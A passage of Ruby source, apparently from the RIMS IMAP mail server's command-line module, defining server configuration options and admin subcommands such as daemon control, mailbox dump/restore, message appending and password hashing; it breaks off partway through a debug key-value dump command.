"Listen socket address. default is `#{Service::DEFAULT_CONFIG.listen_address}'"
) do |host_port|
build.chain{|c|
c.load(server: {
listen_address: host_port
})
}
end
options.on('--accept-polling-timeout=SECONDS',
Float
) do |seconds|
build.chain{|c|
c.load(server: {
accept_polling_timeout_seconds: seconds
})
}
end
options.on('--process-num=NUMBER',
Integer
) do |num|
build.chain{|c|
c.load(server: {
process_num: num
})
}
end
options.on('--process-queue-size=SIZE',
Integer
) do |size|
build.chain{|c|
c.load(server: {
process_queue_size: size
})
}
end
options.on('--process-queue-polling-timeout=SECONDS',
Float) do |seconds|
build.chain{|c|
c.load(server: {
process_queue_polling_timeout_seconds: seconds
})
}
end
options.on('--process-send-io-polling-timeout=SECONDS',
Float) do |seconds|
build.chain{|c|
c.load(server: {
process_send_io_polling_timeout_seconds: seconds
})
}
end
options.on('--thread-num=NUMBER',
Integer
) do |num|
build.chain{|c|
c.load(server: {
thread_num: num
})
}
end
options.on('--thread-queue-size=SIZE',
Integer
) do |size|
build.chain{|c|
c.load(server: {
thread_queue_size: size
})
}
end
options.on('--thread-queue-polling-timeout=SECONDS',
Float
) do |seconds|
build.chain{|c|
c.load(server: {
thread_queue_polling_timeout_seconds: seconds
})
}
end
options.on('--send-buffer-limit=SIZE',
Integer
) do |size|
build.chain{|c|
c.load(connection: {
send_buffer_limit_size: size
})
}
end
options.on('--read-polling-interval=SECONDS',
Float
) do |seconds|
build.chain{|c|
c.load(connection: {
read_polling_interval_seconds: seconds
})
}
end
options.on('--command-wait-timeout=SECONDS',
Float
) do |seconds|
build.chain{|c|
c.load(connection: {
command_wait_timeout_seconds: seconds
})
}
end
options.on('--line-length-limit=SIZE',
Integer
) do |size|
build.chain{|c|
c.load(protocol: {
line_length_limit: size
})
}
end
options.on('--literal-size-limit=SIZE',
Integer
) do |size|
build.chain{|c|
c.load(protocol: {
literal_size_limit: size
})
}
end
options.on('--command-size-limit=SIZE',
Integer
) do |size|
build.chain{|c|
c.load(protocol: {
command_size_limit: size
})
}
end
options.on('--[no-]use-default-charset-aliases'
) do |use_default_aliases|
build.chain{|c|
c.load(charset: {
use_default_aliases: use_default_aliases
})
}
end
options.on('--add-charset-alias=NAME_TO_ENCODING',
/\A \S+,\S+ \z/x,
"Set the alias name and encoding separated with comma (,)."
) do |name_to_encoding|
name, encoding = name_to_encoding.split(',', 2)
build.chain{|c|
c.load(charset: {
aliases: [
{ name: name, encoding: encoding }
]
})
}
end
options.on('--[no-]replace-charset-invalid'
) do |replace|
build.chain{|c|
c.load(charset: {
convert_options: {
replace_invalid_byte_sequence: replace
}
})
}
end
options.on('--[no-]replace-charset-undef'
) do |replace|
build.chain{|c|
c.load(charset: {
convert_options: {
replace_undefined_character: replace
}
})
}
end
options.on('--charset-replaced-mark=MARK',
String
) do |mark|
build.chain{|c|
c.load(charset: {
convert_options: {
replaced_mark: mark
}
})
}
end
options.on('--drb-process-num=NUMBER',
Integer
) do |num|
build.chain{|c|
c.load(drb_services: {
process_num: num
})
}
end
options.on('--drb-load-limit=SIZE',
Integer
) do |size|
build.chain{|c|
c.load(drb_services: {
load_limit: size
})
}
end
options.on('--bulk-response-count=COUNT',
Integer) do |count|
build.chain{|c|
c.load(drb_services: {
engine: {
bulk_response_count: count
}
})
}
end
options.on('--bulk-response-size=SIZE',
Integer) do |size|
build.chain{|c|
c.load(drb_services: {
engine: {
bulk_response_size: size
}
})
}
end
options.on('--read-lock-timeout=SECONDS',
Float
) do |seconds|
build.chain{|c|
c.load(drb_services: {
engine: {
read_lock_timeout_seconds: seconds
}
})
}
end
options.on('--write-lock-timeout=SECONDS',
Float
) do |seconds|
build.chain{|c|
c.load(drb_services: {
engine: {
write_lock_timeout_seconds: seconds
}
})
}
end
options.on('--cleanup-write-lock-timeout=SECONDS',
Float
) do |seconds|
build.chain{|c|
c.load(drb_services: {
engine: {
cleanup_write_lock_timeout_seconds: seconds
}
})
}
end
options.on('--meta-kvs-type=TYPE',
"Choose key-value store type of mailbox meta-data database. default is `" +
KeyValueStore::FactoryBuilder.plug_in_names[0] +
"'."
) do |kvs_type|
build.chain{|c|
c.load(storage: {
meta_key_value_store: {
type: kvs_type
}
})
}
end
options.on('--meta-kvs-config=JSON_DATA',
JSON,
"Configuration for key-value store of mailbox meta-data database."
) do |json_data|
build.chain{|c|
c.load(storage: {
meta_key_value_store: {
configuration: json_data
}
})
}
end
options.on('--[no-]use-meta-kvs-checksum',
"Enable/disable data checksum at key-value store of mailbox meta-data database. default is " +
if (Service::DEFAULT_CONFIG.make_meta_key_value_store_params.middleware_list.include? Checksum_KeyValueStore) then
'enabled'
else
                   'disabled'
end +
"."
) do |use_checksum|
build.chain{|c|
c.load(storage: {
meta_key_value_store: {
use_checksum: use_checksum
}
})
}
end
options.on('--text-kvs-type=TYPE',
"Choose key-value store type of mailbox text-data database. default is `" +
KeyValueStore::FactoryBuilder.plug_in_names[0] +
"'."
) do |kvs_type|
build.chain{|c|
c.load(storage: {
text_key_value_store: {
type: kvs_type
}
})
}
end
options.on('--text-kvs-config=JSON_DATA',
JSON,
"Configuration for key-value store of mailbox text-data database."
) do |json_data|
build.chain{|c|
c.load(storage: {
text_key_value_store: {
configuration: json_data
}
})
}
end
options.on('--[no-]use-text-kvs-checksum',
"Enable/disable data checksum at key-value store of mailbox text-data database. default is " +
if (Service::DEFAULT_CONFIG.make_text_key_value_store_params.middleware_list.include? Checksum_KeyValueStore) then
'enabled'
else
                   'disabled'
end +
"."
) do |use_checksum|
build.chain{|c|
c.load(storage: {
text_key_value_store: {
use_checksum: use_checksum
}
})
}
end
options.on('--auth-hostname=HOSTNAME',
String,
"Hostname to authenticate with cram-md5. default is `#{Service::DEFAULT_CONFIG.make_authentication.hostname}'."
) do |hostname|
build.chain{|c|
c.load(authentication: {
hostname: hostname
})
}
end
options.on('--passwd-config=TYPE_JSONDATA',
/([^:]+)(?::(.*))?/,
"Password source type and configuration. format is `[type]:[json_data]'."
) do |_, type, json_data|
build.chain{|c|
c.load(authentication: {
password_sources: [
{ type: type,
configuration: JSON.load(json_data)
}
]
})
}
end
options.on('--passwd-file=TYPE_FILE',
/([^:]+):(.+)/,
"Password source type and configuration file. format is `[type]:[file]'."
) do |_, type, path|
build.chain{|c|
c.load(authentication: {
password_sources: [
{ type: type,
configuration_file: path
}
]
})
}
end
options.on('--mail-delivery-user=USERNAME',
String,
"Username authorized to deliver messages to any mailbox. default is `#{Service::DEFAULT_CONFIG.mail_delivery_user}'"
) do |username|
build.chain{|c|
c.load(authorization: {
mail_delivery_user: username
})
}
end
options.on('--imap-host=HOSTNAME',
String,
                 'Deprecated.'
) do |host|
warn("warning: `--imap-host=HOSTNAME' is deplicated option and should use `--listen=HOST_PORT'.")
build.chain{|c| c.load(imap_host: host) }
end
options.on('--imap-port=PORT',
String,
                 'Deprecated.'
) do |value|
warn("warning: `--imap-port=PORT' is deplicated option and should use `--listen=HOST_PORT'.")
if (value =~ /\A \d+ \z/x) then
port_number = value.to_i
build.chain{|c| c.load(imap_port: port_number) }
else
service_name = value
build.chain{|c| c.load(imap_port: service_name) }
end
end
options.on('--ip-addr=IP_ADDR',
String,
                 'Deprecated.'
) do |ip_addr|
warn("warning: `--ip-addr=IP_ADDR' is deplicated option and should use `--listen=HOST_PORT'.")
build.chain{|c| c.load(ip_addr: ip_addr) }
end
options.on('--ip-port=PORT',
Integer,
                 'Deprecated.'
) do |port|
warn("warning: `--ip-port=PORT' is deplicated option and should use `--listen=HOST_PORT'.")
build.chain{|c| c.load(ip_port: port) }
end
options.on('--kvs-type=TYPE',
                 'Deprecated.'
) do |kvs_type|
warn("warning: `--kvs-type=TYPE' is deplicated option and should use `--meta-kvs-type=TYPE' or `--text-kvs-type=TYPE'.")
build.chain{|c| c.load(key_value_store_type: kvs_type) }
end
options.on('--[no-]use-kvs-cksum',
                 'Deprecated.'
) do |use_checksum|
warn("warning: `--[no-]use-kvs-cksum' is deplicated option and should use `--[no-]use-meta-kvs-checksum' or `--[no-]use-text-kvs-checksum'.")
build.chain{|c| c.load(use_key_value_store_checksum: use_checksum) }
end
options.on('-u', '--username=NAME',
String,
                 'Deprecated.'
) do |name|
warn("warning: `--username=NAME' is deplicated option and should use `--passwd-config=TYPE_JSONDATA' or `--passwd-file=TYPE_FILE'.")
build.chain{|c| c.load(username: name) }
end
options.on('-w', '--password=PASS',
String,
                 'Deprecated.'
) do |pass|
warn("warning: `--password=PASS' is deplicated option and should use `--passwd-config=TYPE_JSONDATA' or `--passwd-file=TYPE_FILE'.")
build.chain{|c| c.load(password: pass) }
end
build
end
module_function :make_service_config
def cmd_server(options, args)
build = make_service_config(options)
options.parse!(args)
config = build.call
server = Riser::SocketServer.new
service = RIMS::Service.new(config)
service.setup(server)
Signal.trap(:INT) { server.signal_stop_forced }
Signal.trap(:TERM) { server.signal_stop_graceful }
listen_address = Riser::SocketAddress.parse(config.listen_address)
server.start(listen_address.open_server)
0
end
command_function :cmd_server, "Run IMAP server."
def cmd_dump(options, args)
# built-in plug-in
require 'rims/simple_dump'
dump_type = 'simple'
options.on('--dump-type=TYPE', String, 'Choose dump type.') {|value|
dump_type = value
}
opt_verbose = false
options.on('--[no-]verbose') {|value|
opt_verbose = value
}
build = make_service_config(options)
options.parse!(args)
config = build.call
config.require_features
meta_kvs_factory = config.make_meta_key_value_store_params.build_factory
text_kvs_factory = config.make_text_key_value_store_params.build_factory
dump_writer = Dump.get_writer_plug_in(dump_type).new(STDOUT)
Dump.dump_all(dump_writer, config, meta_kvs_factory, text_kvs_factory) {|filename|
if (opt_verbose) then
STDERR.puts filename
end
}
0
end
command_function :cmd_dump, 'Dump mailboxes to standard output.'
def cmd_restore(options, args)
# built-in plug-in
require 'rims/simple_dump'
dump_type = 'simple'
options.on('--dump-type=TYPE', String, 'Choose dump type.') {|value|
dump_type = value
}
opt_dry_run = false
options.on('--[no-]dry-run') {|value|
opt_dry_run = value
}
opt_verbose = false
options.on('--[no-]verbose') {|value|
opt_verbose = value
}
build = make_service_config(options)
options.parse!(args)
config = build.call
config.require_features
meta_kvs_factory = config.make_meta_key_value_store_params.build_factory
text_kvs_factory = config.make_text_key_value_store_params.build_factory
dump_reader = Dump.get_reader_plug_in(dump_type).new(STDIN)
invalid_count = 0
Dump.restore(dump_reader, config, meta_kvs_factory, text_kvs_factory, dry_run: opt_dry_run) {|filename, valid|
unless (valid) then
invalid_count += 1
STDERR.puts "warning: #{filename}: invalid data!"
end
if (opt_verbose) then
puts filename
end
}
if (invalid_count > 0) then
1
else
0
end
end
command_function :cmd_restore, 'Restore mailboxes from standard input.'
def imap_res2str(imap_response)
"#{imap_response.name} #{imap_response.data.text}"
end
module_function :imap_res2str
class Config
def imap_res2str(imap_response)
Cmd.imap_res2str(imap_response)
end
private :imap_res2str
IMAP_AUTH_TYPE_LIST = %w[ login plain cram-md5 ]
MAIL_DATE_PLACE_LIST = [ :servertime, :localtime, :filetime, :mailheader ]
VERBOSE_OPTION_LIST = [
[ :verbose, false, '-v', '--[no-]verbose', "Enable verbose messages. default is no verbose." ]
]
def self.make_imap_connect_option_list(imap_host: 'localhost', imap_port: 143, imap_ssl: false, auth_type: 'login', username: nil)
[ [ :imap_host, imap_host, '-n', '--host=HOSTNAME', "Hostname or IP address to connect IMAP server. default is `#{imap_host}'." ],
[ :imap_port, imap_port, '-o', '--port=PORT', Integer, "Server port number or service name to connect IMAP server. default is #{imap_port}." ],
[ :imap_ssl, imap_ssl, '-s', '--[no-]use-ssl', "Enable SSL/TLS connection. default is #{imap_ssl ? 'enabled' : 'disabled'}." ],
[ :ca_cert, nil, '--ca-cert=PATH', "CA cert file or directory." ],
[ :ssl_params, {}, '--ssl-params=JSON_DATA', JSON, "SSLContext#set_params as parameters." ],
[ :username, username, '-u', '--username=NAME', "Username to login IMAP server. " +
(username ? "default is `#{username}'." : "required parameter to connect server.") ],
[ :password, nil, '-w', '--password=PASS', "Password to login IMAP server. required parameter to connect server." ],
[ :auth_type, auth_type, '--auth-type=METHOD', IMAP_AUTH_TYPE_LIST, "Choose authentication method type (#{IMAP_AUTH_TYPE_LIST.join(' ')}). " +
"default is `#{auth_type}'." ]
]
end
IMAP_CONNECT_OPTION_LIST = make_imap_connect_option_list
POST_MAIL_CONNECT_OPTION_LIST = make_imap_connect_option_list(imap_port: Riser::SocketAddress.parse(Service::DEFAULT_CONFIG.listen_address).port,
username: Service::DEFAULT_CONFIG.mail_delivery_user)
IMAP_MAILBOX_OPTION_LIST = [
[ :mailbox, 'INBOX', '-m', '--mailbox=NAME', String, "Set mailbox name to append messages. default is `INBOX'." ]
]
IMAP_STORE_FLAG_OPTION_LIST = [
[ :store_flag_answered, false, '--[no-]store-flag-answered', "Store answered flag on appending messages to mailbox. default is no flag." ],
[ :store_flag_flagged, false, '--[no-]store-flag-flagged', "Store flagged flag on appending messages to mailbox. default is no flag." ],
[ :store_flag_deleted, false, '--[no-]store-flag-deleted', "Store deleted flag on appending messages to mailbox. default is no flag." ],
[ :store_flag_seen, false, '--[no-]store-flag-seen', "Store seen flag on appending messages to mailbox. default is no flag." ],
[ :store_flag_draft, false, '--[no-]store-flag-draft', "Store draft flag on appending messages to mailbox. default is no flag." ]
]
MAIL_DATE_OPTION_LIST = [
[ :look_for_date, :servertime, '--look-for-date=PLACE', MAIL_DATE_PLACE_LIST,
"Choose the place (#{MAIL_DATE_PLACE_LIST.join(' ')}) to look for the date that as internaldate is appended with message. default is `servertime'."
]
]
def self.symbolize_string_key(collection)
case (collection)
when Hash
Hash[collection.map{|key, value|
[ symbolize_string_key(key),
case (value)
when Hash, Array
symbolize_string_key(value)
else
value
end
]
}]
when Array
collection.map{|value|
case (value)
when Hash, Array
symbolize_string_key(value)
else
value
end
}
else
case (value = collection)
when String
value.to_sym
else
value
end
end
end
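      # Illustrative example (assumed): string keys are symbolized
      # recursively while scalar values inside hashes are left untouched.
      #
      #   symbolize_string_key('logging' => { 'file' => { 'level' => 'info' } })
      #   #=> { logging: { file: { level: 'info' } } }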
def initialize(options, option_list)
@options = options
@option_list = option_list
@conf = {}
for key, value, *_option_description in option_list
@conf[key] = value
end
end
def [](key)
@conf[key]
end
def setup_option_list
@option_list.each do |key, value, *option_description|
@options.on(*option_description) do |v|
@conf[key] = v
end
end
self
end
def help_option(add_banner: nil)
@options.banner += add_banner if add_banner
@options.on('-h', '--help', 'Show this message.') do
puts @options
exit
end
self
end
def quiet_option(default_verbose: true)
@conf[:verbose] = default_verbose
@options.on('-v', '--[no-]verbose', 'Enable verbose messages. default is verbose.') do |verbose|
@conf[:verbose] = verbose
end
@options.on('-q', '--[no-]quiet', 'Disable verbose messages. default is verbose.') do |quiet|
@conf[:verbose] = ! quiet
end
self
end
def load_config_option
@options.on('-f', '--config-yaml=CONFIG_FILE',
String,
"Load optional parameters from CONFIG_FILE.") do |path|
config = YAML.load_file(path)
symbolized_config = self.class.symbolize_string_key(config)
@conf.update(symbolized_config)
end
self
end
def required_feature_option
@options.on('-r', '--required-feature=FEATURE', String, 'Add required feature.') do |feature|
require(feature)
end
      @options.on('--load-library=LIBRARY', String, 'Deprecated.') do |library|
warn("warning: `--load-library=LIBRARY' is deplicated option and should use `--required-feature=FEATURE'.")
require(library)
end
self
end
def key_value_store_option
@conf[:key_value_store_type] = GDBM_KeyValueStore
@options.on('--kvs-type=TYPE',
"Choose key-value store type of mailbox database. default is `" +
KeyValueStore::FactoryBuilder.plug_in_names[0] +
"'."
) do |kvs_type|
@conf[:key_value_store_type] = KeyValueStore::FactoryBuilder.get_plug_in(kvs_type)
end
@conf[:use_key_value_store_checksum] = true
@options.on('--[no-]use-kvs-checksum', 'Enable/disable data checksum at key-value store. default is enabled.') do |use_checksum|
@conf[:use_key_value_store_checksum] = use_checksum
end
      @options.on('--[no-]use-kvs-cksum', 'Deprecated.') do |use_checksum|
warn("warning: `--[no-]use-kvs-cksum' is deplicated option and should use `--[no-]use-kvs-checksum'.")
@conf[:use_key_value_store_checksum] = use_checksum
end
self
end
def parse_options!(args, order: false)
if (order) then
@options.order!(args)
else
@options.parse!(args)
end
pp @conf if $DEBUG
self
end
def imap_debug_option
@options.on('--[no-]imap-debug',
"Set the debug flag of Net::IMAP class. default is false.") do |v|
Net::IMAP.debug = v
end
self
end
def imap_connect
unless (@conf[:username] && @conf[:password]) then
raise 'need for username and password.'
end
args = [ @conf[:imap_host] ]
if (@conf[:imap_ssl]) then
if (@conf[:ssl_params].empty?) then
args << @conf[:imap_port]
args << @conf[:imap_ssl]
args << @conf[:ca_cert]
else
kw_args = {
port: @conf[:imap_port],
ssl: @conf[:ssl_params]
}
args << kw_args
end
else
args << @conf[:imap_port]
end
imap = Net::IMAP.new(*args)
begin
if (@conf[:verbose]) then
puts "server greeting: #{imap_res2str(imap.greeting)}"
puts "server capability: #{imap.capability.join(' ')}"
end
case (@conf[:auth_type])
when 'login'
res = imap.login(@conf[:username], @conf[:password])
puts "login: #{imap_res2str(res)}" if @conf[:verbose]
when 'plain', 'cram-md5'
res = imap.authenticate(@conf[:auth_type], @conf[:username], @conf[:password])
puts "authenticate: #{imap_res2str(res)}" if @conf[:verbose]
else
raise "unknown authentication type: #{@conf[:auth_type]}"
end
yield(imap)
ensure
imap.logout
end
end
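      # Illustrative usage of imap_connect (assumed): the block receives a
      # logged-in Net::IMAP instance and logout is always performed afterwards.
      #
      #   conf.imap_connect {|imap| puts imap.capability.join(' ') }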
def make_imap_store_flags
store_flags = []
[ [ :store_flag_answered, :Answered ],
[ :store_flag_flagged, :Flagged ],
[ :store_flag_deleted, :Deleted ],
[ :store_flag_seen, :Seen ],
[ :store_flag_draft, :Draft ]
].each do |key, flag|
if (@conf[key]) then
store_flags << flag
end
end
puts "store flags: (#{store_flags.join(' ')})" if @conf[:verbose]
store_flags
end
def look_for_date(message_text, path=nil)
case (@conf[:look_for_date])
when :servertime
nil
when :localtime
Time.now
when :filetime
if (path) then
File.stat(path).mtime
end
when :mailheader
RFC822::Message.new(message_text).date
else
raise "failed to look for date: #{place}"
end
end
def make_kvs_factory
builder = KeyValueStore::FactoryBuilder.new
builder.open{|name| @conf[:key_value_store_type].open_with_conf(name, {}) }
if (@conf[:use_key_value_store_checksum]) then
builder.use(Checksum_KeyValueStore)
end
builder.factory
end
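      # Illustrative usage of make_kvs_factory (assumed): the returned factory
      # is a callable that opens a key-value store, optionally wrapped with
      # checksum middleware, as the maintenance commands below do.
      #
      #   kvs = conf.make_kvs_factory.call(File.join(mbox_dir, 'meta'))
      #   begin
      #     kvs.each_key {|key| puts key }
      #   ensure
      #     kvs.close
      #   end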
end
def cmd_daemon(options, args)
conf = Config.new(options,
[ [ :use_status_code,
true,
'--[no-]status-code',
"Return the result of `status' operation as an exit code."
],
[ :is_daemon,
nil,
'--[no-]daemon',
                            'Obsolete.'
],
[ :is_syslog,
nil,
'--[no-]syslog',
                            'Obsolete.'
]
])
conf.help_option(add_banner: ' start/stop/restart/status [server options]')
conf.quiet_option
conf.setup_option_list
conf.parse_options!(args, order: true)
pp args if $DEBUG
operation = args.shift or raise 'need for daemon operation.'
server_options = OptionParser.new
build = make_service_config(server_options)
server_options.parse!(args)
unless (conf[:is_daemon].nil?) then
warn("warning: `--[no-]daemon' is obsoleted option and no effect. use server option `--[no-]daemonize'.")
end
unless (conf[:is_syslog].nil?) then
warn("warning: `--[no-]syslog' is obsoleted option and no effect.")
end
svc_conf = build.call
pp svc_conf if $DEBUG
status_file_locked = lambda{
begin
File.open(svc_conf.status_file, File::WRONLY) {|lock_file|
! lock_file.flock(File::LOCK_EX | File::LOCK_NB)
}
rescue Errno::ENOENT
false
end
}
start_daemon = lambda{
Riser::Daemon.start_daemon(daemonize: svc_conf.daemonize?,
daemon_name: svc_conf.daemon_name,
daemon_debug: svc_conf.daemon_debug?,
daemon_umask: svc_conf.daemon_umask,
status_file: svc_conf.status_file,
listen_address: proc{
# to reload on server restart
build.call.listen_address
},
server_polling_interval_seconds: svc_conf.server_polling_interval_seconds,
server_restart_overlap_seconds: svc_conf.server_restart_overlap_seconds,
server_privileged_user: svc_conf.server_privileged_user,
server_privileged_group: svc_conf.server_privileged_group
) {|server|
c = build.call # to reload on server restart
service = RIMS::Service.new(c)
service.setup(server, daemon: true)
}
}
case (operation)
when 'start'
start_daemon.call
when 'stop'
if (status_file_locked.call) then
pid = YAML.load(IO.read(svc_conf.status_file))['pid']
Process.kill(Riser::Daemon::SIGNAL_STOP_GRACEFUL, pid)
else
abort('No daemon.')
end
when 'restart'
if (status_file_locked.call) then
pid = YAML.load(IO.read(svc_conf.status_file))['pid']
Process.kill(Riser::Daemon::SIGNAL_RESTART_GRACEFUL, pid)
else
start_daemon.call
end
when 'status'
if (status_file_locked.call) then
puts 'daemon is running.' if conf[:verbose]
return 0 if conf[:use_status_code]
else
puts 'daemon is stopped.' if conf[:verbose]
return 1 if conf[:use_status_code]
end
else
raise "unknown daemon operation: #{operation}"
end
0
end
command_function :cmd_daemon, "Daemon start/stop/status tool."
def cmd_environment(options, args)
format = {
yaml: lambda{|env|
YAML.dump(env)
},
json: lambda{|env|
JSON.pretty_generate(env)
}
}
conf = Config.new(options,
[ [ :format_type,
format.keys.first,
'--format=FORMAT',
format.keys,
"Choose display format (#{format.keys.join(' ')})."
]
])
conf.required_feature_option
conf.setup_option_list
conf.parse_options!(args)
env = {
'RIMS Environment' => [
{ 'RUBY VERSION' => RUBY_DESCRIPTION },
{ 'RIMS VERSION' => RIMS::VERSION },
{ 'AUTHENTICATION PLUG-IN' => Authentication.plug_in_names },
{ 'KEY-VALUE STORE PLUG-IN' => KeyValueStore::FactoryBuilder.plug_in_names }
]
}
formatter = format[conf[:format_type]]
puts formatter.call(env)
0
end
command_function :cmd_environment, 'Show rims environment.'
def imap_append(imap, mailbox, message, store_flags: [], date_time: nil, verbose: false)
puts "message date: #{date_time}" if (verbose && date_time)
store_flags = nil if store_flags.empty?
res = imap.append(mailbox, message, store_flags, date_time)
puts "append: #{imap_res2str(res)}" if verbose
nil
end
module_function :imap_append
def each_message(args, verbose: false)
if (args.empty?) then
msg_txt = STDIN.read
yield(msg_txt, nil)
return 0
else
error_count = 0
args.each_with_index do |filename, i|
puts "progress: #{i + 1}/#{args.length}" if verbose
begin
msg_txt = IO.read(filename, mode: 'rb', encoding: 'ascii-8bit')
yield(msg_txt, filename)
rescue
error_count += 1
puts "failed to append message: #{filename}"
Error.trace_error_chain($!) do |exception|
puts "error: #{exception}"
if ($DEBUG) then
for frame in exception.backtrace
puts frame
end
end
end
end
end
if (error_count > 0) then
puts "#{error_count} errors!"
return 1
else
return 0
end
end
end
module_function :each_message
def cmd_post_mail(options, args)
STDIN.set_encoding(Encoding::ASCII_8BIT)
option_list =
Config::VERBOSE_OPTION_LIST +
Config::POST_MAIL_CONNECT_OPTION_LIST +
Config::IMAP_MAILBOX_OPTION_LIST +
Config::IMAP_STORE_FLAG_OPTION_LIST +
Config::MAIL_DATE_OPTION_LIST
conf = Config.new(options, option_list)
conf.help_option(add_banner: ' [POST USER] [MESSAGE_FILEs]')
conf.load_config_option
conf.setup_option_list
conf.imap_debug_option
conf.parse_options!(args)
post_user = args.shift or raise 'need for post user.'
store_flags = conf.make_imap_store_flags
conf.imap_connect{|imap|
unless (imap.capability.find{|c| c == 'X-RIMS-MAIL-DELIVERY-USER' }) then
warn('warning: This IMAP server might not support RIMS mail delivery protocol.')
end
each_message(args) do |msg_txt, filename|
t = conf.look_for_date(msg_txt, filename)
encoded_mbox_name = Protocol::Decoder.encode_delivery_target_mailbox(post_user, conf[:mailbox])
imap_append(imap, encoded_mbox_name, msg_txt, store_flags: store_flags, date_time: t, verbose: conf[:verbose])
end
}
end
command_function :cmd_post_mail, "Post mail to any user."
def cmd_imap_append(options, args)
STDIN.set_encoding(Encoding::ASCII_8BIT)
option_list =
Config::VERBOSE_OPTION_LIST +
Config::IMAP_CONNECT_OPTION_LIST +
Config::IMAP_MAILBOX_OPTION_LIST +
Config::IMAP_STORE_FLAG_OPTION_LIST +
Config::MAIL_DATE_OPTION_LIST
conf = Config.new(options, option_list)
conf.help_option(add_banner: ' [MESSAGE_FILEs]')
conf.load_config_option
conf.setup_option_list
conf.imap_debug_option
conf.parse_options!(args)
store_flags = conf.make_imap_store_flags
conf.imap_connect{|imap|
each_message(args) do |msg_txt, filename|
t = conf.look_for_date(msg_txt, filename)
imap_append(imap, conf[:mailbox], msg_txt, store_flags: store_flags, date_time: t, verbose: conf[:verbose])
end
}
end
command_function :cmd_imap_append, "Append message to IMAP mailbox."
def cmd_mbox_dirty_flag(options, args)
option_list = [
        [ :return_flag_exit_code, true, '--[no-]return-flag-exit-code', 'Dirty flag value is returned as the exit code. default is true.' ]
]
conf = Config.new(options, option_list)
conf.required_feature_option
conf.key_value_store_option
conf.help_option(add_banner: ' [mailbox directory]')
conf.quiet_option
conf.setup_option_list
write_dirty_flag = nil
options.on('--enable-dirty-flag', 'Enable mailbox dirty flag.') { write_dirty_flag = true }
options.on('--disable-dirty-flag', 'Disable mailbox dirty flag.') { write_dirty_flag = false }
conf.parse_options!(args)
pp conf if $DEBUG
mbox_dir = args.shift or raise 'need for mailbox directory.'
meta_db_path = File.join(mbox_dir, 'meta')
unless (conf[:key_value_store_type].exist? meta_db_path) then
raise "not found a mailbox meta DB: #{meta_db_path}"
end
kvs_factory = conf.make_kvs_factory
meta_db = DB::Meta.new(kvs_factory.call(File.join(mbox_dir, 'meta')))
begin
unless (write_dirty_flag.nil?) then
meta_db.dirty = write_dirty_flag
end
if (conf[:verbose]) then
puts "dirty flag is #{meta_db.dirty?}."
end
if (conf[:return_flag_exit_code]) then
if (meta_db.dirty?) then
1
else
0
end
else
0
end
ensure
meta_db.close
end
end
command_function :cmd_mbox_dirty_flag, 'Show/enable/disable dirty flag of mailbox database.'
def cmd_unique_user_id(options, args)
options.banner += ' [username]'
options.parse!(args)
if (args.length != 1) then
raise 'need for a username.'
end
username = args.shift
puts Authentication.unique_user_id(username)
0
end
command_function :cmd_unique_user_id, 'Show unique user ID from username.'
def cmd_list_user_id(options, args)
svc_conf = RIMS::Service::Configuration.new
load_service_config = false
options.banner += ' [base directory] OR -f [config.yml path]'
options.on('-f', '--config-yaml=CONFIG_FILE',
String,
'Load optional parameters from CONFIG_FILE.') do |path|
svc_conf.load_yaml(path)
load_service_config = true
end
options.parse!(args)
unless (load_service_config) then
base_dir = args.shift or raise 'need for base directory.'
svc_conf.load(base_dir: base_dir)
end
MailStore.scan_unique_user_id(svc_conf) do |unique_user_id|
puts unique_user_id
end
0
end
command_function :cmd_list_user_id, 'List all user ID.'
def cmd_show_user_mbox(options, args)
svc_conf = RIMS::Service::Configuration.new
load_service_config = false
options.banner += ' [base directory] [username] OR -f [config.yml path] [username]'
options.on('-f', '--config-yaml=CONFIG_FILE',
String,
'Load optional parameters from CONFIG_FILE.') do |path|
svc_conf.load_yaml(path)
load_service_config = true
end
options.parse!(args)
unless (load_service_config) then
base_dir = args.shift or raise 'need for base directory.'
svc_conf.load(base_dir: base_dir)
end
username = args.shift or raise 'need for a username.'
unique_user_id = Authentication.unique_user_id(username)
puts svc_conf.make_key_value_store_path(MAILBOX_DATA_STRUCTURE_VERSION, unique_user_id)
0
end
command_function :cmd_show_user_mbox, "Show the path in which user's mailbox data is stored."
def cmd_pass_hash(options, args)
option_list = [
        [ :hash_type, 'SHA256', '--hash-type=DIGEST', String, 'Password hash type (e.g. SHA256, MD5). default is SHA256.' ],
[ :stretch_count, 10000, '--stretch-count=COUNT', Integer, 'Count to stretch password hash. default is 10000.' ],
[ :salt_size, 16, '--salt-size=OCTETS', Integer, 'Size of salt string. default is 16 octets.' ]
]
conf = Config.new(options, option_list)
conf.help_option(add_banner: <<-'EOF'.chomp)
passwd_plain.yml
Example
$ cat passwd_plain.yml
- { user: foo, pass: open_sesame }
- { user: "#postman", pass: "#postman" }
$ rims pass-hash passwd_plain.yml >passwd_hash.yml
$ cat passwd_hash.yml
---
- user: foo
hash: SHA256:10000:YkslZucwN2QJ7LOft59Pgw==:d5dca9109cc787220eba65810e40165079ce3292407e74e8fbd5c6a8a9b12204
- user: "#postman"
hash: SHA256:10000:6Qj/wAYmb7NUGdOy0N35qg==:e967e46b8e0d9df6324e66c7e42da64911a8715e06a123fe5abf7af4ca45a386
Options:
EOF
conf.setup_option_list
conf.parse_options!(args)
pp conf if $DEBUG
case (args.length)
when 0
passwd, *_optional = YAML.load_stream(STDIN)
when 1
passwd, *_optional = File.open(args[0]) {|f| YAML.load_stream(f) }
else
raise ArgumentError, 'too many input files.'
end
digest_factory = Password::HashSource.search_digest_factory(conf[:hash_type])
salt_generator = Password::HashSource.make_salt_generator(conf[:salt_size])
for entry in passwd
pass = entry.delete('pass') or raise "not found a `pass' entry."
entry['hash'] = Password::HashSource.make_entry(digest_factory, conf[:stretch_count], salt_generator.call, pass).to_s
end
puts passwd.to_yaml
0
end
command_function :cmd_pass_hash, 'Make hash password configuration file from plain password configuration file.'
def cmd_debug_dump_kvs(options, args)
option_list = [
[ :match_key, nil, '--match-key=REGEXP', Regexp, 'Show keys matching regular expression.' ],
[ :dump_size, true, '--[no-]dump-size', 'Dump size of value with key.' ],
[ :dump_value, true, '--[no-]dump-value', 'Dump value with key.' ],
[ :marshal_restore, true, '--[no-]marshal-restore', 'Restore serialized object.' ]
]
conf = Config.new(options, option_list)
conf.required_feature_option
conf.key_value_store_option
conf.help_option(add_banner: ' [DB_NAME]')
conf.setup_option_list
conf.parse_options!(args)
pp conf if $DEBUG
name = args.shift or raise 'need for DB name.'
unless (conf[:key_value_store_type].exist? name) then
raise "not found a key-value store: #{name}"
end
factory = conf.make_kvs_factory
db = factory.call(name)
begin
db.each_key do |key|
